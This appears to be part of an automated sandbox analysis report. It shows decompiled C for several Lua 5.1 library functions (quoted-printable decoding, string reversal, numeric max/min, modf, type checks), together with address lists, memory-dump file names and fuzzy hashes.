0x10007ac7
0x10007ac7
0x10007aca
0x10007ad1
0x10007ad2
0x10007ad2
0x10007ae3
0x10007ae6
0x10007ae8
0x10007af4
0x10007af7
0x10007af9
0x10007afb
0x10007afe
0x10007b00
0x10007b1c
0x10007b28
0x10007b2a
0x10007b33
0x10007b02
0x10007b02
0x10007b05
0x10007b08
0x10007b0d
0x10007b0d
0x10007b0e
0x10007b11
0x10007b15
0x10007b1b
0x10007b1b
0x10007aed
0x10007aed
0x10007af3
0x10007af3
0x00000000
0x00000000
0x1000797c
0x10007984
0x10007986
0x100079a1
0x100079a4
0x100079bb
0x00000000
0x100079a9
0x100079a9
0x100079af
0x100079af
0x10007988
0x10007988
0x1000798c
0x1000798d
0x1000798e
0x1000798f
0x10007994
0x10007997
0x100079a0
0x100079a0
0x00000000
0x00000000
0x10007b34
0x10007b37
0x10007b39
0x10007b3b
0x10007b3e
0x10007b40
0x10007b52
0x10007b56
0x10007b42
0x10007b42
0x10007b45
0x10007b4c
0x10007b4d
0x10007b4d
0x10007b5e
0x10007b61
0x10007b63
0x10007b6f
0x10007b72
0x10007b74
0x10007b76
0x10007b79
0x10007b7b
0x10007b97
0x10007ba3
0x10007ba5
0x10007bae
0x10007b7d
0x10007b7d
0x10007b80
0x10007b83
0x10007b88
0x10007b88
0x10007b89
0x10007b8c
0x10007b90
0x10007b96
0x10007b96
0x10007b68
0x10007b68
0x10007b6e
0x10007b6e
0x00000000
0x00000000
0x00000000
0x00000000
0x1000781c
0x10007910
0x10007916
0x10007919
0x10007930
0x10007930
0x1000791b
0x1000791e
0x10007920
0x10007920
0x10007933
0x10007935
0x10007c77
0x10007c7a
0x10007c95
0x10007c95
0x10007c7c
0x10007c81
0x10007c83
0x10007c83
0x10007c98
0x10007c9a
0x10007cba
0x10007cbd
0x10007cdc
0x10007cdc
0x10007cbf
0x10007cc7
0x10007cc9
0x10007cc9
0x10007ce1
0x10007ce3
0x10007d26
0x10007d2a
0x10007d2f
0x10007d32
0x10007d35
0x10007d37
0x10007d3c
0x10007d3e
0x10007d54
0x10007d59
0x10007d40
0x10007d40
0x10007d45
0x10007d48
0x10007d4b
0x10007d4b
0x10007d5c
0x10007d64
0x10007d67
0x10007d82
0x10007d82
0x10007d69
0x10007d6f
0x10007d71
0x10007d71
0x10007d87
0x10007ce5
0x10007ce5
0x10007ce7
0x10007cea
0x00000000
0x10007d26
0x10007d26
0x00000000
0x00000000
0x10007d8b
0x10007d8b
0x10007d9b
0x10007da0
0x10007da6
0x10007da8
0x10007dc2
0x10007dca
0x10007daa
0x10007db4
0x10007db4
0x10007dba
0x10007dba
0x10007cec
0x10007cec
0x10007cef
0x10007cf1
0x10007cf3
0x10007cf6
0x10007cf8
0x10007d1d
0x10007d25
0x10007cfa
0x10007cfa
0x10007d04
0x10007d04
0x10007d05
0x10007d08
0x10007d10
0x10007d10
0x10007cf8
0x10007cea
0x00000000
0x00000000
0x00000000
0x1000793b
0x1000793b
0x1000793e
0x10007940
0x10007942
0x10007945
0x10007947
0x10007962
0x10007967
0x1000796a
0x10007949
0x10007954
0x10007957
0x10007957
0x00000000
0x10007947
0x00000000

APIs

_isctype.MSVCRT ref: 1000791E

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: _isctype
String ID:
API String ID: 162844146-0
Opcode ID: c272692460c4cf5e1a31f8420e57b25e58fe221bc950b48e4a7e3596cd5dad61
Instruction ID: 720ea45e40ef653a38e1a008a106f4002719a8c94b2d045a289e4cbee1165de6
Opcode Fuzzy Hash: c272692460c4cf5e1a31f8420e57b25e58fe221bc950b48e4a7e3596cd5dad61
Instruction Fuzzy Hash: F661A275A00241CFE355CF18D881965B7F1FF8A38472488BEE58A8B765D636FC86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009C1B80, Relevance: 6.1, APIs: 4, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E009C1B80(char _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _t19;
				void* _t20;
				signed int _t22;
				intOrPtr _t25;
				signed char _t37;
				intOrPtr _t43;
				intOrPtr _t48;
				intOrPtr* _t53;
				intOrPtr* _t55;
				intOrPtr* _t56;

				_t19 = _a12;
				_t55 = _a8;
				 *((char*)(_t55 + _t19)) = _a4;
				_t43 =  *_t55;
				_t20 = _t19 + 1;
				if(_t43 == 0xd) {
					if(_t20 >= 2) {
						if( *((char*)(_t55 + 1)) == 0xa) {
							_push(2);
							_push(_t55);
							_push(_a16);
							L009C2144();
						}
						goto L20;
					}
					goto L21;
				} else {
					if(_t43 == 0x3d) {
						if(_t20 < 3) {
							L21:
							return _t20;
						} else {
							_t22 =  *((intOrPtr*)(_t55 + 1));
							if(_t22 == 0xd &&  *((char*)(_t55 + 2)) == 0xa) {
								goto L20;
							}
							_t48 =  *((intOrPtr*)(_t55 + 2));
							_t37 =  *((intOrPtr*)((_t22 & 0x000000ff) + 0x9c40c0));
							_t11 = _t48 + 0x9c40c0; // 0xffffffff
							_t25 =  *_t11;
							_a4 = 0;
							if(_t37 > 0xf || 0 > 0xf) {
								_push(3);
								_push(_t55);
								_push(_a16);
								L009C2144();
								return 0;
							} else {
								_t56 = _a16;
								_t14 = _t56 + 0x20c; // 0x20d
								if( *_t56 >= _t14) {
									_push(_t56);
									L009C210E();
									_t25 = _a4;
								}
								 *((char*)( *_t56)) = (_t37 << 4) + _t25;
								 *_t56 =  *_t56 + 1;
								return 0;
							}
						}
					} else {
						if(_t43 == 9 || _t43 > 0x1f && _t43 < 0x7f) {
							_t53 = _a16;
							_t6 = _t53 + 0x20c; // 0x20d
							if( *_t53 >= _t6) {
								_push(_t53);
								L009C210E();
							}
						} else {
							L20:
							return 0;
						}
						 *((char*)( *_t53)) =  *_t55;
						 *_t53 =  *_t53 + 1;
						return 0;
					}
				}
			}

0x009c1b80
0x009c1b89
0x009c1b8d
0x009c1b90
0x009c1b92
0x009c1b96
0x009c1c6b
0x009c1c71
0x009c1c77
0x009c1c79
0x009c1c7a
0x009c1c7b
0x009c1c80
0x00000000
0x009c1c71
0x00000000
0x009c1b9c
0x009c1b9f
0x009c1be5
0x009c1c86
0x009c1c86
0x009c1beb
0x009c1beb
0x009c1bf0
0x00000000
0x00000000
0x009c1c03
0x009c1c07
0x009c1c0f
0x009c1c0f
0x009c1c18
0x009c1c1c
0x009c1c57
0x009c1c59
0x009c1c5a
0x009c1c5b
0x009c1c67
0x009c1c23
0x009c1c23
0x009c1c29
0x009c1c31
0x009c1c33
0x009c1c34
0x009c1c39
0x009c1c3d
0x009c1c47
0x009c1c4d
0x009c1c52
0x009c1c52
0x009c1c1c
0x009c1ba1
0x009c1ba4
0x009c1bb9
0x009c1bbf
0x009c1bc7
0x009c1bc9
0x009c1bca
0x009c1bcf
0x009c1c83
0x009c1c83
0x00000000
0x009c1c83
0x009c1bd6
0x009c1bdb
0x009c1be1
0x009c1be1
0x009c1b9f

APIs

luaL_prepbuffer.LUA5.1(00000001,00000000,00000001,009C1B48,00000000,?,00000000,?), ref: 009C1BCA
luaL_prepbuffer.LUA5.1(00000001,?,00000001,009C1B48,00000000,?,00000000,?), ref: 009C1C34
luaL_addlstring.LUA5.1(00000001,?,00000003,?,00000001,009C1B48,00000000,?,00000000,?), ref: 009C1C5B
luaL_addlstring.LUA5.1(009C1B48,?,00000002,00000001,009C1B48,00000000,?,00000000,?), ref: 009C1C7B

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: L_addlstring.L_prepbuffer.
String ID:
API String ID: 4145930887-0
Opcode ID: 8f7d7c6059040b6997859fd41c58be6f40efa8e840d2850db9324e5c7e715780
Instruction ID: d6211a0f73c75a8f30e51c22aeb498895751ea6e921ae77192c996a4f97b0bcc
Opcode Fuzzy Hash: 8f7d7c6059040b6997859fd41c58be6f40efa8e840d2850db9324e5c7e715780
Instruction Fuzzy Hash: 6331B571E886425FE725CB28E491F97BBE69B97310F18885EF1D4C3203D220D845CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 100144E0, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100144E0(void* __eflags, intOrPtr _a4) {
				char _v0;
				char _v524;
				char _v528;
				intOrPtr _t20;
				intOrPtr _t27;
				void* _t39;
				void* _t42;

				_t39 = E1000F4A0(__eflags, _a4, 1,  &_v528);
				E1000FC00(_a4,  &_v524);
				_t20 = _v528;
				_t42 =  &_v528 + 0x14;
				_v528 = _t20 - 1;
				if(_t20 != 0) {
					do {
						_t46 = _v524 -  &_v0;
						if(_v524 >=  &_v0) {
							E1000F9E0(_t46,  &_v524);
							_t42 = _t42 + 4;
						}
						 *_v524 =  *((intOrPtr*)(_v528 + _t39));
						_t27 = _v528;
						_v524 = _v524 + 1;
						_v528 = _t27 - 1;
					} while (_t27 != 0);
				}
				E1000FB40( &_v524);
				return 1;
			}

0x10014500
0x10014504
0x10014509
0x1001450d
0x10014515
0x10014519
0x1001451b
0x10014526
0x10014528
0x1001452f
0x10014534
0x10014534
0x10014542
0x10014548
0x1001454d
0x10014556
0x10014556
0x1001451b
0x10014561
0x10014576

APIs

luaL_checklstring.LUA5.1(?,00000001,?), ref: 100144F7

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_buffinit.LUA5.1(?,?,?,00000001,?), ref: 10014504
luaL_prepbuffer.LUA5.1(?), ref: 1001452F
luaL_pushresult.LUA5.1(?), ref: 10014561

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_buffinit.L_checklstring.L_prepbuffer.L_pushresult.lua_tolstring.
String ID:
API String ID: 2576782297-0
Opcode ID: 86ab13813a30de9624fef9664fa0563e865a34352f6f1c1802f84d5582bc592a
Instruction ID: d1bf5f458ba8c56842d1ce918631bdf75fa145f8d52abb7bdaebbc6aa85808d5
Opcode Fuzzy Hash: 86ab13813a30de9624fef9664fa0563e865a34352f6f1c1802f84d5582bc592a
Instruction Fuzzy Hash: 7C01A5785047466FD704DB18C4859ABB7E5EFD4390F00C82DF89887266EA30E985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 100132D0, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E100132D0(void* __eflags, long long __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				long long _v12;
				void* __ebx;
				signed char _t13;
				void* _t15;
				void* _t22;
				signed int _t24;
				void* _t27;
				void* _t29;
				long long _t33;

				_t33 = __fp0;
				_t29 = __eflags;
				_t19 = _a4;
				_t15 = E10001150(_a4);
				E1000F540(_t15, _t29, __fp0, _t19, 1);
				_v12 = _t33;
				_t22 = 2;
				_t27 = (_t24 & 0xfffffff8) - 0xc + 0xc;
				_t30 = _t15 - 2;
				if(_t15 >= 2) {
					do {
						_t13 = E1000F540(_t15, _t30, _t33, _t19, _t22);
						asm("fcom qword [esp+0x18]");
						_t27 = _t27 + 8;
						asm("fnstsw ax");
						if((_t13 & 0x00000001) == 0) {
							st0 = _t33;
						} else {
							_v12 = _t33;
						}
						_t22 = _t22 + 1;
					} while (_t22 <= _t15);
				}
				E100018E0(_t19, _v12, _v8);
				return 1;
			}

0x100132d0
0x100132d0
0x100132dc
0x100132e8
0x100132ea
0x100132ef
0x100132f3
0x100132f8
0x100132fb
0x100132fd
0x100132ff
0x10013301
0x10013306
0x1001330a
0x1001330d
0x10013312
0x1001331a
0x10013314
0x10013314
0x10013314
0x1001331c
0x1001331d
0x100132ff
0x1001332c
0x1001333f

APIs

lua_gettop.LUA5.1(?), ref: 100132E0
luaL_checknumber.LUA5.1(?,00000001,?), ref: 100132EA

Part of subcall function 1000F540: lua_tonumber.LUA5.1(?,?), ref: 1000F54F
Part of subcall function 1000F540: lua_isnumber.LUA5.1(?,?), ref: 1000F56C

luaL_checknumber.LUA5.1(?,00000002), ref: 10013301
lua_pushnumber.LUA5.1(?,?,?), ref: 1001332C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checknumber.$lua_gettop.lua_isnumber.lua_pushnumber.lua_tonumber.
String ID:
API String ID: 2573354654-0
Opcode ID: f311bdd4c293f841cf1d71a763b8aaf0135801702ca63537b83f12ee612662bb
Instruction ID: 2d4690d30fca9eeafe38e92b046650cd3bfa04b8c82571849a946d2a8851d9c2
Opcode Fuzzy Hash: f311bdd4c293f841cf1d71a763b8aaf0135801702ca63537b83f12ee612662bb
Instruction Fuzzy Hash: 88F04C76A0420023D610ED489CC2ABFB7ECDBC16D0F00092DFE94522C1EA71ED9643E7

Uniqueness

Uniqueness Score: -1.00%

Function 10013340, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E10013340(void* __eflags, long long __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				long long _v12;
				void* __ebx;
				signed char _t13;
				void* _t15;
				void* _t22;
				signed int _t24;
				void* _t27;
				void* _t29;
				long long _t33;

				_t33 = __fp0;
				_t29 = __eflags;
				_t19 = _a4;
				_t15 = E10001150(_a4);
				E1000F540(_t15, _t29, __fp0, _t19, 1);
				_v12 = _t33;
				_t22 = 2;
				_t27 = (_t24 & 0xfffffff8) - 0xc + 0xc;
				_t30 = _t15 - 2;
				if(_t15 >= 2) {
					do {
						_t13 = E1000F540(_t15, _t30, _t33, _t19, _t22);
						asm("fcom qword [esp+0x18]");
						_t27 = _t27 + 8;
						asm("fnstsw ax");
						if((_t13 & 0x00000041) != 0) {
							st0 = _t33;
						} else {
							_v12 = _t33;
						}
						_t22 = _t22 + 1;
					} while (_t22 <= _t15);
				}
				E100018E0(_t19, _v12, _v8);
				return 1;
			}

0x10013340
0x10013340
0x1001334c
0x10013358
0x1001335a
0x1001335f
0x10013363
0x10013368
0x1001336b
0x1001336d
0x1001336f
0x10013371
0x10013376
0x1001337a
0x1001337d
0x10013382
0x1001338a
0x10013384
0x10013384
0x10013384
0x1001338c
0x1001338d
0x1001336f
0x1001339c
0x100133af

APIs

lua_gettop.LUA5.1(?), ref: 10013350
luaL_checknumber.LUA5.1(?,00000001,?), ref: 1001335A

Part of subcall function 1000F540: lua_tonumber.LUA5.1(?,?), ref: 1000F54F
Part of subcall function 1000F540: lua_isnumber.LUA5.1(?,?), ref: 1000F56C

luaL_checknumber.LUA5.1(?,00000002), ref: 10013371
lua_pushnumber.LUA5.1(?,?,?), ref: 1001339C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checknumber.$lua_gettop.lua_isnumber.lua_pushnumber.lua_tonumber.
String ID:
API String ID: 2573354654-0
Opcode ID: be168474d455871d387546e736e58b2e2ad8ca5506940369cc9243502da259ac
Instruction ID: 34fc56e8bf4691cb1a9473286fcf40f19ab4c958ada9e010713e511d593e534b
Opcode Fuzzy Hash: be168474d455871d387546e736e58b2e2ad8ca5506940369cc9243502da259ac
Instruction Fuzzy Hash: D2F02876A0420163D710E9499CC2AAFB7DCDBC1690F10056DFE98522C1EA65E99543EA

Uniqueness

Uniqueness Score: -1.00%

Function 00991390, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00991390(void* __eax, void* __eflags, long long __fp0, void* _a4) {
				void* _t7;
				char _t17;

				_t17 = _a4;
				_push(0);
				_push(1);
				_push(_t17);
				L00994B54();
				_a4 = 0;
				_t7 = E00991400(__eflags, __eax,  &_a4);
				_t16 = _t7;
				if(_t7 == 0) {
					_push( *_a4);
					_push(_t17);
					L00994AD0();
					E00991650( *_a4, __fp0, _t17, _a4);
					return 2;
				} else {
					_push(_t17);
					L00994B4E();
					_push(E009946E0(_t16));
					_push(_t17);
					L00994AD0();
					return 2;
				}
			}

0x00991391
0x00991396
0x00991398
0x0099139a
0x0099139b
0x009913a4
0x009913ae
0x009913b3
0x009913ba
0x009913e0
0x009913e1
0x009913e2
0x009913ed
0x009913fc
0x009913bc
0x009913bc
0x009913bd
0x009913c8
0x009913c9
0x009913ca
0x009913d9
0x009913d9

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 0099139B
lua_pushnil.LUA5.1(?), ref: 009913BD
lua_pushstring.LUA5.1(?,00000000,00000000,?), ref: 009913CA
lua_pushstring.LUA5.1(?,00000000), ref: 009913E2

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$L_checklstring.lua_pushnil.
String ID:
API String ID: 2680789078-0
Opcode ID: 96a08347e369bf5cafa426778346756c07dce58ee12468a83e0c017547eaf526
Instruction ID: b3e39cac99bebe63e6c2c5e63616745cb4a517ab3e85c1e69860b2cf2cacefbc
Opcode Fuzzy Hash: 96a08347e369bf5cafa426778346756c07dce58ee12468a83e0c017547eaf526
Instruction Fuzzy Hash: 61F090B560511127EA12BA1CEC47FAF739CDFD5354F040458F40057242D668994782FA

Uniqueness

Uniqueness Score: -1.00%

Function 1000F690, Relevance: 6.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F690(void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t7;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				void* _t14;
				void* _t20;

				_t20 = __fp0;
				_t13 = _a8;
				_t12 = _a4;
				if(_t13 <= 0) {
					_t18 = _t13 - 0xffffd8f0;
					if(_t13 > 0xffffd8f0) {
						_t11 = E10001150(_t12);
						_t14 = _t14 + 4;
						_t13 = _t13 + _t11 + 1;
					}
				}
				_t7 = E1000F630(_t18, _t20, _t12, _t13, _a12);
				if(_t7 != 0) {
					E100013D0(__eflags, _t12, _t13);
					E10002070(_t12, 1, 1);
					return 1;
				} else {
					return _t7;
				}
			}

0x1000f690
0x1000f691
0x1000f696
0x1000f69c
0x1000f69e
0x1000f6a4
0x1000f6a7
0x1000f6ac
0x1000f6af
0x1000f6af
0x1000f6a4
0x1000f6ba
0x1000f6c4
0x1000f6cb
0x1000f6d5
0x1000f6e4
0x1000f6c8
0x1000f6c8
0x1000f6c8

APIs

lua_gettop.LUA5.1(?), ref: 1000F6A7
luaL_getmetafield.LUA5.1(?,?,?), ref: 1000F6BA
lua_pushvalue.LUA5.1(?,?), ref: 1000F6CB
lua_call.LUA5.1(?,00000001,00000001,?,?), ref: 1000F6D5

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_getmetafield.lua_call.lua_gettop.lua_pushvalue.
String ID:
API String ID: 2881719532-0
Opcode ID: 857d87dee5b5b38da487cccbbdba6748bfe543ae8705d989ab2311c0088c2779
Instruction ID: 4aba93018eab9533f90f1371732769aa6fa4bb3436fd7a3771569e247e3002d5
Opcode Fuzzy Hash: 857d87dee5b5b38da487cccbbdba6748bfe543ae8705d989ab2311c0088c2779
Instruction Fuzzy Hash: 50F0A03BA142202AE611D5197C42BFF6399CBC1BE4F02002DFD44A725AD352BD86A1E2

Uniqueness

Uniqueness Score: -1.00%

Function 10013070, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E10013070(void* __ebx, long long __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				long long _v12;
				intOrPtr _v16;
				char _v20;
				void* _t18;
				signed int _t21;
				long long _t26;

				_t26 = __fp0;
				E1000F540(__ebx, _t21 & 0xfffffff8, __fp0, _a4, 1);
				 *((long long*)((_t21 & 0xfffffff8) - 0x14)) = _t26;
				__imp__modf( &_v20, _t18);
				_v12 = _t26;
				E100018E0(_a4, _v20, _v16);
				E100018E0(_a4, _v12, _v8);
				return 2;
			}

0x10013070
0x10013085
0x1001308a
0x1001308d
0x1001309b
0x100130a2
0x100130b2
0x100130c3

APIs

luaL_checknumber.LUA5.1(?,00000001,?), ref: 10013085

Part of subcall function 1000F540: lua_tonumber.LUA5.1(?,?), ref: 1000F54F
Part of subcall function 1000F540: lua_isnumber.LUA5.1(?,?), ref: 1000F56C

modf.MSVCRT ref: 1001308D
lua_pushnumber.LUA5.1(?,?,?), ref: 100130A2
lua_pushnumber.LUA5.1(?,?,?,?,?,?), ref: 100130B2

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$L_checknumber.lua_isnumber.lua_tonumber.modf
String ID:
API String ID: 2145581263-0
Opcode ID: e7561f9268e3568e43fe5e87ae92c07d2174972b4cf7e4164d19fab8076a063e
Instruction ID: 06642c7130660ea7ddea44d8d94ec2912d76749f3e8a5f7c0d5c0299b166c128
Opcode Fuzzy Hash: e7561f9268e3568e43fe5e87ae92c07d2174972b4cf7e4164d19fab8076a063e
Instruction Fuzzy Hash: 03F08975514610ABD200EB54DC46DAB77ECDF88650F004659F99443281DA70FE50C7E7

Uniqueness

Uniqueness Score: -1.00%

Function 00A22A60, Relevance: 6.0, APIs: 4, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00A22A60(void* __eax, intOrPtr _a4) {
				intOrPtr _t5;

				_t5 = _a4;
				_push(0);
				_push(1);
				_push(_t5);
				L00A23F32();
				_push(__eax);
				_push(0xffffd8f0);
				_push(_t5);
				L00A23F02();
				_push(0xffffffff);
				_push(_t5);
				L00A23F4A();
				if(__eax == 0) {
					_push(__eax);
					_push(_t5);
					L00A23FAA();
				}
				return 1;
			}

0x00a22a61
0x00a22a66
0x00a22a68
0x00a22a6a
0x00a22a6b
0x00a22a72
0x00a22a73
0x00a22a78
0x00a22a79
0x00a22a7e
0x00a22a80
0x00a22a81
0x00a22a8b
0x00a22a8d
0x00a22a8e
0x00a22a8f
0x00a22a94
0x00a22a9e

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 00A22A6B
lua_getfield.LUA5.1(?,FFFFD8F0,00000000,?,00000001,00000000), ref: 00A22A79
lua_type.LUA5.1(?,000000FF,?,FFFFD8F0,00000000,?,00000001,00000000), ref: 00A22A81
luaL_newmetatable.LUA5.1(?,00000000), ref: 00A22A8F

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checklstring.L_newmetatable.lua_getfield.lua_type.
String ID:
API String ID: 3824222968-0
Opcode ID: fade0679d2f0a8ed446a734281535f9f6d186e53255a251cf4e2c18c452b87a0
Instruction ID: 0158bb56ab9ad7f610bf283e45a3c8adfda5402c16d7f19e2a88ffcbb95e2185
Opcode Fuzzy Hash: fade0679d2f0a8ed446a734281535f9f6d186e53255a251cf4e2c18c452b87a0
Instruction Fuzzy Hash: 47E08C3396927231ED24211E7E02FDF156C4F83720F100234F9106A2C0E9485E8241BA

Uniqueness

Uniqueness Score: -1.00%

Function 009911C0, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E009911C0(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* _t3;
				intOrPtr _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t5 = _a4;
				_t4 = _a8;
				_push(_t4);
				_push(_t5);
				L00994AFA();
				_t7 = _t6 + 8;
				if(__eax != 1) {
					_push(1);
					_push(_t5);
					L00994B24();
					_push(__eax);
					_push(_t4);
					_push(_t5);
					L00994B1E();
					_t7 = _t7 + 0x14;
				}
				_push(_t4);
				_push(_t5);
				L00994B18();
				return _t3;
			}

0x009911c0
0x009911c1
0x009911c6
0x009911ca
0x009911cb
0x009911cc
0x009911d1
0x009911d7
0x009911d9
0x009911db
0x009911dc
0x009911e1
0x009911e2
0x009911e3
0x009911e4
0x009911e9
0x009911e9
0x009911ec
0x009911ed
0x009911ee
0x009911f8

APIs

lua_type.LUA5.1(?,?), ref: 009911CC
lua_typename.LUA5.1(?,00000001), ref: 009911DC
luaL_typerror.LUA5.1(?,?,00000000,?,00000001), ref: 009911E4
lua_toboolean.LUA5.1(?,?), ref: 009911EE

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_typerror.lua_toboolean.lua_type.lua_typename.
String ID:
API String ID: 1850846656-0
Opcode ID: d6c29797a6604dead2f12a230ac2ac00b0ae06943b73c53ccfa48ac3fc58f0a9
Instruction ID: ef67595342e569a04c1c9ff0a0021cf0b4a5437f9301ccda3e7e114f1f723910
Opcode Fuzzy Hash: d6c29797a6604dead2f12a230ac2ac00b0ae06943b73c53ccfa48ac3fc58f0a9
Instruction Fuzzy Hash: 1CD02EB390212033CD23320D2C02FCF2A6CEFEB702F090419F900A2202E241DA8782F7

Uniqueness

Uniqueness Score: -1.00%

Function 00992F20, Relevance: 6.0, APIs: 4, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00992F20(void* __eax, intOrPtr _a4) {
				intOrPtr _t4;
				void* _t5;
				void* _t6;

				_t4 = _a4;
				_push(1);
				_push(_t4);
				L00994AB8();
				_push(1);
				_push(_t4);
				L00994AFA();
				_t6 = _t5 + 0x10;
				if(__eax == 0) {
					_push(__eax);
					_push(E00993020);
					_push(_t4);
					L00994ABE();
					_t6 = _t6 + 0xc;
				}
				_push(1);
				_push(E00992F70);
				_push(_t4);
				L00994ABE();
				return 1;
			}

0x00992f21
0x00992f25
0x00992f27
0x00992f28
0x00992f2d
0x00992f2f
0x00992f30
0x00992f35
0x00992f3a
0x00992f3c
0x00992f3d
0x00992f42
0x00992f43
0x00992f48
0x00992f48
0x00992f4b
0x00992f4d
